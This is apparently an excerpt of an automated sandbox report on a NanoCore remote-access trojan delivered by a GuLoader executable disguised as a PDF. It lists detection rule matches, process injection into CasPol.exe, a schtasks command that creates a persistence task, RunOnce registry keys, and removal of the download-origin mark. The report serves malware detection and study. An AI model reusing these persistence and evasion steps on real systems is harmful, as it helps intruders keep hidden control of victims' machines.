    Source: 8.3.CasPol.exe.39165717.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 8.3.CasPol.exe.3915fce9.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.3.CasPol.exe.3915fce9.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 8.3.CasPol.exe.3915fce9.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 8.3.CasPol.exe.3914b6be.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.3.CasPol.exe.3914b6be.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 8.3.CasPol.exe.3914b6be.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: Process Memory Space: CasPol.exe PID: 7876, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: CasPol.exe PID: 7876, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040344A
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile created: C:\Windows\resources\0409Jump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_004068DA2_2_004068DA
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00404CED2_2_00404CED
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_019104B012_2_019104B0
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_0191093812_2_01910938
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeVirustotal: Detection: 45%
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeReversingLabs: Detection: 47%
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile read: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeJump to behavior
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmp
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmpJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040344A
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Deskriptiv155Jump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsxE303.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@11/16@3/3
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,2_2_00402104
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_00404771 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_00404771
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1760:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:872:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1760:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:304:WilStaging_02
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:872:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{e277811f-20a3-49b6-ae15-cbb22e96ee2f}
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
    Source: DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: CasPol.exe, 00000008.00000003.167512023875.0000000039142000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000002.00000002.167511188846.0000000008C46000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_10002DE0 push eax; ret 2_2_10002E0E
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dllJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Windowss.exeJump to dropped file

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp673D.tmp
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
